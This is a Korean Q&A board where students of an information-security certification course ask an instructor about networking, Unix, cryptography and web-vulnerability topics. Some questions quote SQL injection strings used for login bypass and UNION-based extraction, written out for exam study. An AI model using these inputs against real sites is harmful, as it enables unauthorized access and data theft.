서버로는 CentOS release 6.10 (Final) 버전을 사용했습니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
각각의 용어에 대한 질문
p71네트워크보안 보안쉘ssh 공부중에 질문이 있습니다 ssh sftp sshd 라는 용어가 있는데 각각의 차이와 정의를 정확하게 알고싶습니다 ㅠㅠ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
2020년 실기 76강 내용 중 질문이 있습니다
76강 맨 마지막에 작성해주신 내용에 대한 질문이 있습니다. (상세 : 76강, 076.웹어플리케이션취약점_02/p352~355의 46분 13초 경) select id,pass from member where id='$id'; 일때 id 변수? 파라미터? 에 대한 답을 쓰는게 문제였습니다. 이때 설명해주신 답안 중에 DB에 상관없이 모두 허용되는것이 ~~id='' or 'a'='a'; 이라고 적어주셨는데 이게 DB에 상관없는 이유로 예측한 것이 1. 이전에 문제에서는 select id,pass from member where id='$id' and pass='$pass' 와 같은 상황에서 사용하여 # 또는 --과 같은 주석이 꼭 필요하였으나, 문제에서는 뒤에 and pass='$pass' 문구가 없으므로 바로 True 되어 넘어간다. 2. 맨 마지막에 적어준 ; 으로 인하여 select id,pass from member where id='' or 'a'='a';으로 문구가 실행되어 뒤에 and pass 같은 것들이 나온다고 하더라도 상관없이 True가 되는것이다.(?) 사실, 2번은 위에서 True 되었어도 뒤에 and pass='$pass'부분에서 에러가 나서 에러 문구를 화면에 뿌려줄것같긴해요..ㅎㅎ 어떤 요소로 True 되어 넘어가는지 잘 이해가 안되서 확실히 하고싶어서 연락드렸습니다. !추가 요청! 선생님 이전에 문의드렸던 38강 내용에 대한 답변을 볼수가없는데 어떤식으로 봐야하는지 설명해주세요 뭔가 첨부해주셨다고 하셨는데 제가 첨부했던 사진만 보이네요ㅠ 확인 부탁드립니다. 샘 댓글에 문의글을 또 올릴수있지 않아서 이렇게 쓰게 되었습니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
38강 IP fragmentation 관련질문
ip 프로토콜은 비연결형 프로토콜로 연결 상태를 유지하기 않기 때문에 패킷 전송 순서를 보장하지 않는다고 알고있습니다. 3008바이트의 데이터를 보낼 때 ip단편화가 일어나는데 이것도 패킷 순서를 보장하지 않는다면 만약 마지막 단편(flag:0)이 먼저 오면 그 뒤에 오는 단편은 버리는 건가요? 무조건 순서대로 오는건가요? 강의에서는 순서대로 설명을 해주시는데 두개의 부분에 혼란이 와서 질문드립니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
2020년 실기 38강 내용 중 질문이 있습니다
38강 내용이 IP프로토콜에 대한 내용입니다 설명 중 P.167 에서 (나) 동작방식의 실습을 보여주면서 보았던 Wireshark 내에서 가장 마지막 단편의 Total Length = 76로 표현되었고 교재의 마지막 단편 Total Length=68 로 차이가 있어서 언급하고 넘어가 주셨습니다. 이 부분에 이해가 안되는 내용이 있어서요 강의 내용 내의 설명으로는 PING 을 이용하여 테스트 하였기 때문에 ICMP의 헤더인 8 Byte가 추가되어 76로 표현되었다고 해주셨습니다 그러나, 마지막 부분에 강의 설명 인 IP 헤더 내 Protocol(8 byte) 는 상위 프로토콜을 식별하기 위한 프로토콜 번호를 저장하는 필드인데 이 필드는 그저 다음 프로토콜을 가르키는 번호를 저장하고 있을 뿐이고 ICMP는 IP보다 상위계층이라서 현재 그림내에 표현이 안되고 있는건가요? 즉, wireshark로 볼때는 7계층의 데이터를 표현하고 있으므로 icmp 헤더가 붙는 형식으로 표현되고 있다 라고 이해하면 될까요? 그림으로 이해하고 싶은데 잘 모르겠네요;;ㅜㅜ 첨부파일에 그림 그렸어요 확인 부탁드려요 ㅎㅎ(잘못된거면 고쳐 주시면 감사합니다)
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
윈도우 SRM의 Full Name은 무엇인가요?
안녕하세요. 강의 처음에 있는 윈도우 인증과정 주요요소 중에 SRM의 Full Name이 두가지로 기재가 되어 있어 문의를 드립니다. 1. Security Reference Monitor - Page 23 윈도우 인증과정 주요 서비스 SRM(Security Reference Monitory) 2. Service Reference Monitor - 그림 1.1.1 윈도우 인증 서비스 도표 하단 SRM(Service Reference Monitor) - Page 24 SRM(Service Reference Monitor) 서비스 기능 두가지 중 어떤것이 맞는 것인지? 아니면 두가지 모두 혼용해서 사용하는지 궁금합니다. 인터넷에서도 두가지 모두 나와 있어 더욱 헛갈려서 문의 드립니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
수강중인 보안기사 실기 132강 내용중..
132강 정보보호일반 특강 암호학 02 내용중 OFB에 대한 설명으로 암호화, 복호화 병렬처리가 가능하다 되있는데, 타사 책이나 인터넷을 찾아봐도 OFB 모드의 암복호화 병렬처리는 안된다고 되어있습니다. 강사님의 정확한 답변 부탁드립니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
안녕하세요. 정보보안기사(실기) 수강생입니다.
안녕하세요. 정보보안기사(실기) 수강생입니다. 강의에서 강사님이 vm으로 os설치해서 강의하셔서 저도 같이 실습해보고 싶습니다. 혹시 os들 배포자료가 있나요? 혹시 있다면 지인분 말을 들어보니 예전에는 카페에 올려두셨다고 하던데 제가 아무리 찾아도 못찾겠어서요. 어디에 업로드 하시는지 알려주세요.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
tcp 4-way handshake 종료 과정 질문 드립니다.
정일영 교수님 안녕하세요. tcp 4way handshake 종료과정 문제풀이 중에 의문이 들어서 질문 드립니다. FIN_WAIT1 상태가 될려면 FIN+ACK 패킷을 먼저 보내야 되는걸로 알고 있는데요. 2020 실기 문제편 214번 문제보면 FIN 패킷을 보내면 FIN_WAIT1 상태가 된다고 나와 있습니다. 인터넷 검색해보니 4way-handshake 종료과정은 FIN을 보냈을떄 FIN_WAIT1 상태가 된다고 나와있습니다. 제가 실기 강의 들었을떄는 FIN+ACK 패킷을 보냈을떄 FIN_WAIT1 상태가 되었던걸로 기억하는데요. 2020 기사 이론편 186쪽 내용도 동일합니다. 답변 부탁드리겠습니다. 감사합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
문제편 p121 / 202번
안녕하십니까 정일영 교수님 이번 정보보안기사 필기를 합격하고 동회차 실기 합격을 위해 노력하고 있는 학생 전선아 입니다. 문제편을 푸는 도중 모르는 것이 생겨 Q&A 남깁니다. 첨부파일에 있는 문제에서 172.16.5.28이 왜 16개의 서브넷 마스크를 가지는지 모르겠습니다. 길어도 좋으니 설명해주시면 정말 감사하겠습니다 교수님,, 또한 서브넷 영역이 왜 172.16.5.16~172.16.5.31 인지도 같이 설명해주시면 감사하겠습니다
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
질문드려요
안녕하세요. 강의 처음 듣고 있는데요 교재 23페이지 윈도우 인증구조는 challenge&response 를 사용한다 했는데 다음으로 설명해주신 사전공격방법은 NTLMv2 을 크랙 하는걸 보여주셨잖아요 왜 아이디 및 패스워드 인증방식을 쓰나요 challenge&response방식을 안쓰고요
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
3강에 나오는 연습장 파일은 따로 받을 수 없나요??
3강에 나오는 개념 정리된 연습장 파일은 따로 받을 수 없나요??
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
리버스쉘 침해사고 시나리오
타겟 웹서버에서 nc프로그램을 커넥터로 동작시킨다고 하셨는데, 타겟 웹서버에 nc프로그램을 어떻게 설치하나요? 또, 타겟 웹서버의 nc커넥터가 공격자의 PC/서버에 어떻게 접속하나요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
tcp fin,xmas,null 스캔
필기 수업 때는 포트가 닫혀있을 때 응답이 RST으로 온다고 알려주셨는데 실기 수업에서는 RST+ACK라고 하셔서요. 뭐가 맞는건가요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
웹 사이트가 GET, POST 인지 확인 하는 방법?
특정 웺 사이트가 GET 방식인지, POST 방법으로 만들어진 페이지인지 확인하는 방법이 있을까요? 단순하게 URL만으로 구별을 할 수 있는건지 아니면 다른 방법이 있는건지 궁금합니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
/etc/pam.d 설정 문의드립니다.
안녕하세요. 강의 중 /etc/pam.d/system-auth 파일 설정 중 패스워드 차단과, 규칙에 관한 설정은 ssh 접속시에는 적용이 안되고 telnet 접속 시에만 적용되는건지 궁금합니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
http traffic 스니핑 관련
실습 내용을 보면 희생자의 PC or 취약한 서버 등에 프락시 tool (burp)을 설치하여 응답이나 요청 메시지를 캡쳐해서 강의를 해주셨는데요. 실제 해커들은 어떤 방법으로 (시나리오)웹 traffic을 스니핑 하게 되는지 궁금합니다. N/W 영역에서 스니핑은 보통 동일한 LAN 대역이나 NW 상일건데,, http는 보통 인터넷 구간 일건데요. 공부를 하다가 이 부분이 계속 궁금했습니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
학습 기준시간을 초과했다고 나오면서 강의 수강이 안되네요
13강 학습 기준시간을 초과했다고 나오면서 강의 수강이 안되네요. 들을수 있도록 조치해 주세요
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
114강 침해사고유형별시나리오 질문입니다.
들었던 강의 중에 가장 긴 80분 짜리였는데 아주 재미 있었습니다. 한가지 기초적인 질문인데요 로컬 포트 포워딩이나 리모트 포트 포워딩에서, 동작원리는 이해했는데, SSH server side 의 PC에서 SSH 요청을 받아 주는 22번 데몬을 구동하는 부분이 없는데요. ssh -L 이나 SSH -R 명령어를 사용하게 되면 상대편(SSH server)에 자동으로 데몬이 시작되는지 궁금합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
UDP 스캔 관련해서 문의합니다.
UDP 스캔의 기본 목적은 UDP 스캔 오픈 여부 확인에 있습니다. Target Port Open : 응답 X or UDP 응답 Target Port Close : ICMP unreachable ( type 3 , code 3 ) 의 패킷 수신으로 알고 있습니다. 그런데, 방화벽 정책에 의해 Filtered 되었을 때 ( 하지만, port 는 open 되어 있을 때) 의 구분을 어떻게 하는지 궁금합니다. 일반적으로 F/W 필터링 시, Drop 정책을 사용하여 응답이 없지만 Reject 정책으로 ICMP Unreachable 을 반환하는데 포트는 열려있지만 필터링 되었을 경우 state 를 close 로 판단 할 수 있다고 생각하는데 차이가 있을까요?? 세부적인 icmp 코드가 다른가요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
82강 웹취약점 질문 입니다.
파일삽입 취약점 대응방안에서 만약 개발자가 반드시 include, require등의 함수를 사용해서 외부 URL등을 불러와서 구현을 해야 하는 경우라면 어떻게 대응해야 할까요? php.ini 파일에서 allow_url_fopen을 Off 하면 업무적으로 구현이 안될것 같은데요. 이럴경우는 관리자가 악의적인 파일이 있는지 잘 점검하는 방법 밖에 없는지요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
2020 실기
안녕하십니까 정일영 교수님 이번에 지안패스를 통해 2020 실기 강의를 듣게 된 전선아라고 합니다. 다름이 아니라 2019년도 실기 강의에 비해 현저히 강의 수가 작은 걸 확인할 수 있었습니다. 반이 줄어들었는데 혹시 그 이유를 알 수 있을까요? 실기 강의 열심히 들어서 꼭 합격하겠습니다! 감사합니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
세션 타임아웃과 no cache에 대한 질문
강사님의 강의를 잘 듣고 있는 중입니다. 그 중에, 질문이 있어 이렇게 글을 남깁니다. 1. timeout에 대해서는 apache에서 httpd.conf의 timeout과 php.ini 파일에서 session.gc_maxlifetime이 있는 것으로 알고 있습니다. 혹시 여기에 우선순위가 존재하는지 궁금합니다.(혹시나 두개의 의미가 다르다면 설명 부탁 드립니다..) 2. html head에 보면 http 1.1버전에서 로 그 페이지의 no cache를 설정한다 하셨습니다. 그런데, proxy를 통해서 no-cache를 cache로 바꾼다면, 그 페이지에 대해서는 cache를 통해서 동작을 하게 되는지 궁금합니다. 혹은 보안조치를 해 놓으면 변경이 불가능하게 될까요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
49강 질문입니다.
TCP SYN flooding 공격에 대한 대응책 중에서 (226 page), 방화벽 또는 DDoS 대응장비를 이용하여 동일 Client(IP)의 SYN 연결 요청에 대한 임계치 설정을 통해서 차단 한다고 설명 되어 있는데요. 이때 공격자는 동일 IP가 아니고 Source IP를 변경 하면서 공격 할건데,, 방어가 될지.. 올바른 표현인지 궁금합니다. 아니면 제가 이해를 잘못하고 있는건지 설명 부탁 합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
PFS에 대한 질문
안녕하세요 열심히 수업을 듣는 중에 계속 궁금한 점이 생깁니다.. DH을 사용할 경우에 p, g 값은 서로 전달하고, a와 b가 되는 각각의 개인키로 이산대수를 대입하여 p^a mod g 값이 서로 public key(반대편의 경우 p^b mod g)가 되는 것으로 알고 있습니다. 그리고, 각각이 계산한 p^ab mod g가 각각이 갖는 공통의 premaster key가 된다고 저는 이해했습니다. 1. 그렇다면 단축협상을 진행할 경우 master secret과 client random, server random으로 key block을 생성하게 되는데 이 값은 client random과 server random이 매 협상시마다 바뀌기 때문에 키 교환이 항상 새롭게 이루어진다는 말씀이신것이지요? 2. 그렇다면 PFS의 경우 DH에서만 사용이 가능하다고 하였습니다. 혹시 PFS는 여러 세션이 있으면 각각에 대한 순방향 비밀성이 이루어지는 건가요(2-1) 아니면 한 세션 내에서 단축협상을 이룰 때마다 만들어지는 건가요(2-2)? 2-1) 여러 세션에 대해 순방향이 이루어진다면 세션마다 완전 협상을 맺을 때 개인키는 같고 p, g값이 변경이 되기 때문에 premaster secret이 변경이 되어 PFS가 이루어지는 건가요? 2-2) 이 경우는... 불가능한 거 같아 보입니다.. 제가 질문을 어렵게 썼더라면 다시 한번 더 올리도록 하겠습니다... 바쁘실텐데 항상 답변 달아주심에 감사합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
66강. DNS 프로토콜 질문
질문 드립니다. dig에서 +norecurse 명령어를 치면 authoritative 네임서버가 반복적 질의를 수행하여 정상 응답 여부 점검이라고 설명을 해 주셨습니다. 그러면 명령어 dig @ns.algisa.com www.algisa.com +norecurse에서 본다면 ns.algisa.com이 iterative query로 질의를 하게 된다는 건가요? 예를 들어서 dig @ns.algisa.com www.naver.com +noecurse를 사용하게 된다면 사용자는 ns.algisa.com 네임서버로 recursive query를 하게 되고 ns.algisa.com이 iterative query로 root / 1차 / 2차 이렇게 순차적으로 query를 하게 되는 건가요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
ping에 대한 궁금증
한번 올렸었는데 다시 한번 더 상세히 질문드립니다. ping이라는 건 icmp 기반으로 상대 host를 찾습니다. 그러려면 ip가 셋팅이 되어야 하고 mac주소가 셋팅이 되어야 할 겁니다.. 예를 들어서 host가 없는 ip에 ping을 치게 된다면 당사자 입장에서는 mac주소를 모를테니, mac 주소를 확인하는 arp를 로컬 네트워크에 전달을 하게 될거라 생각하고 그 arp request에 대한 응답이 없을테니 time exceeded로 나오는 건지 여쭈어 보았습니다.. (무선환경에서 확인하였지만 무선환경이라도 802.3 / 802.11 프레임(?)만 다르지 나머지는 같을거라 생각은 합니다..)
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
6강 질문 입니다.
6강 15분 14초 부분에서요. find . -perm 4000 명령어를 하면 정확히 setuid 와 일치한것만 출력이 된다고 했는데요. 실행파일중에 suid.out 파일이 정확히 setuid와 일치하는거니 출력되어야 하는거 아닌가요? 제가 잘못 이해하고 있는것 같은데 추가 설명 부탁 드립니다. 이해가 안갑니다. 추가로 4000에서 4의 의미도 알려주세요. 2000의 의미도 부탁 합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강좌 46. TCP ACK SCAN 질문 있습니다.
Q. TCP Ack Scan은 방화벽의 룰셋을 테스트하는 스캔이라고 하셨습니다. 그런데, 포트가 닫혀 있는 경우라면 방화벽 유무에 따라서 무응답 or RST 패킷으로 확인이 가능할 겁니다. 그런데 포트가 열려 있는 경우라면 Ack scan으로 어떻게 확인이 가능한가요? 방화벽 유무에 상관 없이 모두 응답없음으로 응답이 오는거 아닌가요?(방화벽이 존재하면 응답없음 or ICMP 에러 메시지이겠지만, 방화벽이 없다 하더라도 서버 입장에서 ACK를 바로 받으면 무시하는 걸로 알고 있습니다.) Q. 내부에 없는 IP에 ping을 하게 되면 mac주소를 모르니까 먼저 arp로 확인을 하는데 이 부분도 존재하지 않으니까 time exceeded로 나오게 되는건가요? (패킷 덤프를 떠 보면 arp 통신은 따로 없긴 합니다..)
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강좌 58. ESP 질문입니다
강의 내용을 확인해보면 맨 마지막 ESP 실습을 보여주실 때 IP가 10.10.10.180 / 10.10.10.170으로 보여주고 있었습니다. 서버 to 서버이기에 전송모드로 실습을 진행하신 것 같았습니다. 그런데 생각해보면 터널모드도 wireshark에서 똑같이 보일 거라고 생각됩니다만, Wireshark 내에서는 터널모드인지 전송모드인지는 구분할 수 없는 것이지요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강좌 46. TCP ACK SCAN 질문 있습니다.
책의 경우에 TCP ACK SCAN의 경우 "방화벽의 룰셋을 테스트 하기 위한 스캔이다."라고 되어 있습니다. 하지만, 강의 내용과 개요의 3번에 "stateful inspection인지 packet filtering F/W인지 점검할 목적으로 사용한다"으로 되어 있습니다. 1. 룰셋이란 제가 알기로 각 방화벽의 정책들을 의미하는 것으로 알고 있습니다. 룰셋을 테스트 하기 위한 스캔이다. 라는 말이 맞는 의미 인가요? 룰셋에 대한 정확한 정의를 알려주세요.. 2. 그렇다면 제가 이해한 stateful inspection이라면 TCP ACK SCAN을 하면 모두 F/W에서 필터링이 될 것이고, packet filtering이라면 서버에서 RST을 날릴테니, "TCP ACK SCAN은 F/W의 종류를 파악하는 방법이다"라고만 이야기 하는게 더 맞을까요??
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
TCP Session Hijacking에 대한 질문입니다.
세션 하이재킹에서 (가) 개요의 3번에서 "Sequence Number를 예측하여 세션을 탈취하게 된다."라고 말씀을 하셨습니다. 그런데 강의 내용에서는 Attacker는 그냥 스니핑 중이라고만 말씀을 하셔서 세션 탈취를 못한다는 쪽으로 말씀을 하시는 것 같아서요..
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강좌 8. unix/linux기본학습_7 문의 입니다.
강의를 잘 듣고 있습니다. 이해가 쏙쏙 되는 중에 한가지 궁금증이 있어서 문의를 남깁니다. 1. shell이 다른 process를 실행할 때 fork가 되고 exec를 실행하여 이미지 전이를 한다고 합니다. 그러면서 foreground mode가 변경이 되는 것이라고 이해하였습니다. 이로써 서로 pid와 ppid 관계가 만들어지는 것이지요. 그런데, a.out이 foreground mode일 때 a.out이 같은 여러 process를 만들 때도 fork를 하여 똑가튼 a.out을 만드는 것으로 알고 있습니다. 그러면 a.out(parent)는 background mode, a.out(child)는 foreground mode가 되는 건가요? 아니면 위와 같은 논리가 성립이 되는 것이 아니라 다른 논리가 성립이 되는걸까요? session id 자체가 변경이 되는 걸까요? 말씀 중에 process group 단위로 이루어진다고 말씀을 하셔서 a.out의 parent와 child는 같은 mode가 이루어져야 할 것 같은데 이해가 조금 안됩니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
68강 recursive dns 관련 named.conf 설정
allow-recursion {127.0.0.1;192.168.56.0/24}; 이 설정에서 루프백 주소가 들어가는데 혹시 어떤 이유가 있어서 들어가는건가요? 아니면 예시용으로 넣어 놓으신건가요
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
시스템 보안 관련 실습하실때 관련 질문
1. stack buffer overflow공격 실습진행하실때 buffer size가 선언한대로 크기가 잡혔던 거 같은데 따로 ASLR이나 스택가드는 없이 진행하신건가요? 요즘 gdb로 보면 다 char buf[12]하면 12바이트 이상 잡던데요.. 제가 저번에 궁금해서 했다가 실패했던 기억이 드는데 바로 성공하신거 보니까 궁금합니다. 2. race condition에서 여러번 실행해서 몇 번 성공가능하다고 하셨는데 그게 context switching이 아예 안 일어날수 있어서 그런가요? 한번이라도 일어나면 성공되는거죠? 3. 추가적으로 윈도우즈 도메인에 대하여 정리를 해보았는데 맞는 것인지 확인차 질문드립니다. 윈도우즈 도메인이란. DC(domain controller)에 사용자 계정, 컴퓨터 및 장치들을 등록한후, 다른 컴퓨터에서 자신의 계정으로 로그인하여 DC에서 인증 받은후 자신의 컴퓨터처럼 로그인 가능한 네트워크이다. 라고 정리를 해보았습니다. 적절한지 궁금합니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
IPSec질문 있습니다.
안녕하세요 강의 정말 잘 듣고 있습니다 교수님. 한 가지 질문이 있어서 이렇게 올립니다. 교재로 보면 271페이지에 양쪽 터널/보안 게이트웨이 구간 ip패킷 보호 그림을 보면 제가 이해한 내용은 New_ip헤더가 보안 게이트웨이간 사용되는것이고 목적지 보안 게이트웨이에 도착을 하면 역캡슐화를 하여 원래의 ip헤더(오리지날)가 나와 게이트웨이에서 목적지로 전송하는 것으로 이해를 했습니다. 그리고 교수님께서 목적지 게이트웨이와 목적지 종단간에는 사내구간으로 보고 안전한다고 보고 간다고 말씀하셔서 잘 이해를 했는데, 270페이지에 똑같은 그림을 보면은 종단이랑 게이트웨이 구간에 원본 ip 헤더는 암호화되어 있기 때문에 터널/보안 게이트웨이와 종단 노드 구간의 트래픽 흐름의 기밀성이 보장된다고 나와있고 그렇게 설명해주셨는데 목적지 터널/보안게이트웨이 도착하면 역캡슐화되서 암호화도 풀리고 그 게이트웨이가 본래의 ip헤더를 보고 목적지로 보내주는 방식이 아닌가요? 설명이랑 책에는 목적지 도착까지 암호화 되있다고 나와있어서 혼란이 와서 이렇게 질문드립니다. 답변 부탁드리겠습니다!
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
Sleep과 Blocked상태 같은 상태인가요?
47페이지에서 ps -l의 결과에서 첫 번째 명령어 dbus-launch가 왜 있는지 궁금하고요.. 그리고 S필드에서 S상태면 (인터럽트가능한) sleep상태로 알고 있는데 이것이 Blocked상태랑 같은 의미로 볼 수 있나요? WCHAN필드에서 poll_s가 blocking system call이라고 말씀하셔서 그렇게 생각들었습니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
파일과 디렉터리 기본접근권한이란 단어에 대해서
기본접근 권한이 파일과 디렉터리에 대해 666 777이라고 말씀하셨는데 실무에서도 "기본접근 권한"이라는 용어를 사용하나요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
ARP packet
ARP 관련 실습 참고자료에서 패킷길이를 32bit기준으로 나누셨는데 MAC주소의 경우 hardware length 6bytes가 되고, Protocol length가 4bytes가 되면 그림이 잘못나온거 같은데... 이해가 되지 않아서 질문 올립니다!
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
131강 전체 재생이 되지 않습니다.
131강 전체 재생이 되지 않습니다. 교수님이 말씀이 중간에 끊기네요. 확인부탁드립니다. 모바일 재생이며, 그리고 132강, 133강은 없는건가요? 체크 항목은 있는데. 안보이는 건지 확인 부탁드립니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
실기 이론교재 p167(Section 4 네트워크 기본학습)
(3)라우팅 경로 계산 II 에서 목적지 주소(10.0.122.100)과 왜 세번째행 Genmask(255,255,192,0)을 비트 And연산하는지 궁금합니다. 셋째행을 쓰는 다른 이유가 있나요? 두번째행의 Genmask(255,255,224,0) 등 을 쓰지 않는지요 감사합니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
정보보안기사 필기 기출문제 풀어보고 싶습니다.
기출문제 최신 10회정도 풀어보고싶은데 어디서 자료를 구할 수 있나요??? 구글이나 알기사 홈페이지에서도 찾기 힘듭니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
RUID와 EUID가 나오는 부분이 어딘가요?
동영상강의를 순서대로 듣지 않고 필요한 부분이 있어 중간중간 들었는데, RUID와 EUID에 대해 앞서 설명했다는 부분이 있었어요. 시스템보안 부분인것 같은데 이 내용은 몇회차 영상을 봐야 들을 수 있을까요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
Slow HTTP read Dos 질문 드립니다.
Slow HTTP Header/POST 대응방법으로 동일한 출발지IP 동시 연결개수 임계치 설정이 있는데요 Slow HTTP read Dos도 동시연결개수를 제한하면 되지 않나요? 제가 아직 TCP연결을 이해 못한건지 궁금합니다..;
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
Syn flooding 대응방안 질문입니다.
DDos에서 Syn flooding 공격 대응책 중 방화벽 또는 DDoS대응장비를 이용하여 동일 Client(IP)의 연결요청에 대한 임계치(Threshhold) 설정을 통해 과도한 연결요청 발생을 차단한다고 하셨는데요 이 공격은 source IP를 랜덤한 주소로 바꾸기 때문에 위의 대응책은 소용 없지 않나요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
자바 언어로 어떻게 보안을 할 수 있나요?
뜬금없는 질문이라 죄송하지만 기사준비를 하면서 원하는 회사 면접준비 중인데, 나왔던 질문중에 "자바언어로 어떻게 보안을 할 수 있나요?" 라는 질문이 나왔다는데 너무 막연한 질문이라, 한두줄로 어떻게 답변할지 감이 안옵니다. 도와주세요 강사님!!ㅜㅜ
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강사님 도와주세요
지금 3주도 남지 않은 상태인데 인강이 70여개정도 남았습니다 ㅠㅠ 인강을 들으면 반복할 시간이 없을텐데 정말 모르는 부분만 인강을 듣고 그렇지 않은 부분은 인강에 의지하지 않고 혼자 공부하고 문제풀이하는게 좋을까요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
개인정보 보호법 질문있습니다.
예제들이 보면 회원가입 주가 되던데 개인이 요구할때도 해당하는지 궁금합니다. 예를들어 요즘 단톡방같은것도 특정 개인이 이름,연락처 학사정보등을 개인이 확인용으로 받는다며 받은 후, 해당 단톡방의 비밀번호를 알려주는 경우가 있는데 제가 메세지나 사진으로 전송한 정보를 어떻게 처리할지와 이용기간 등을 고지를 안해줘도 문제가 되는건가요?
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
iptables 질문
-m limit --limit 5/minute -j DROP -m recent --seconds 60 --hitcoundt 5 -j DROP 리미트는 분당 5개 초과한거 드랍이니까 다음 1분에 또 5개 찍혀서 분당 5개씩만 허용이고 힛카운트는 5개 초과시 영구적으로 계속 드랍인건가요? 책 예제에는 리미트로 로그만 찍어서 질문 드립니다.
2019 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
SID번호에 대해서..
제꺼 SID를 찾아보니 SID가 503하고 504로 되어있는데 503하고 504도 게스트 식별자인가요?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
가상머신에 실습 하기 위해 세팅하는 법
안녕하세요. 정보보안기사를 취득하기 위해 공부 중인 취준생입니다. 다름이 아니라 강의를 보는 중 강사님께서 실습을 하시던데 저도 실습을 하면서 학습 하고 싶으나 리눅스 등 다른 운영체제에 대해 공부한 적이 없어서 세팅하는 법을 찾아보고 있는데요. 혹시 앞으로 강의 내용(시스템,네트워크)을 실습 하기 위해 어떤 것을 세팅해놓으면 좋은지 알 수 있을까요?! 이와 같이 첨부파일과 같이 강사님처럼 직접해보면서 공부 하고 싶습니다!! 그리고 항상 강의를 통해 잘 가르쳐주셔서 감사합니다.^^ 날씨 추운데 감기 조심하세요
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
웹 어플리케이션 취약점 질문 드립니다
클라이언트에서만 검증을 하고 서버에서는 안했을때 Web Proxy 공격에 취약하다고 나왔는데요. Web proxy를 거쳐 가게하려면 클라이언트 웹브라우저에서 프록시 설정을 한다고 들었는데 공격자가 클라이언트 웹브라우저를 직접 설정하는것도 아니고 어떻게 하는건가요?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
프로세스랑 프로그램 구분이요
실행중인 프로그램을 프로세스라 하는걸로 알고있는데 서술형 문제에 프로세스 프로그램 구분 크게 해줘야하나요??
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
Blind SQL Injection관련 질문입니다
강사님 강의 잘듣고 있습니다^^ 2018알기사책 페이지 355쪽 아래부분 게시판에서 제목 필드에 ' and 1=2 union select 'a','b','c','d','e','f','g','h','i'# 구문에서 union앞에 왜 1=1이 아닌 1=2를 넣는지가 궁금합니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
질문이 있습니다.
11번째 강의에서요 fedora crontab설정에서 netcat(nc)명령어를 사용하셨는데 fedora에 netcat을 미리 설치하신건가요 아니면 기본적으로 명령어가 되는건가요?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
httpd.conf 파일 옵션 역할
안녕하세요 정보보안기사 실기 수강하고있는 수험생입니다 아파치기준 httpd.conf파일에서 Timeout 옵션이있는데 이 옵션은 session ID에 대한 만료시간인가요 ??? 아니면 단순히 네트워크 연결의 idle timeout기준인가요?? 연결 기준이라하면 root의 ssh 접속 임계치 기반 세션관리 처럼 동작하는 것
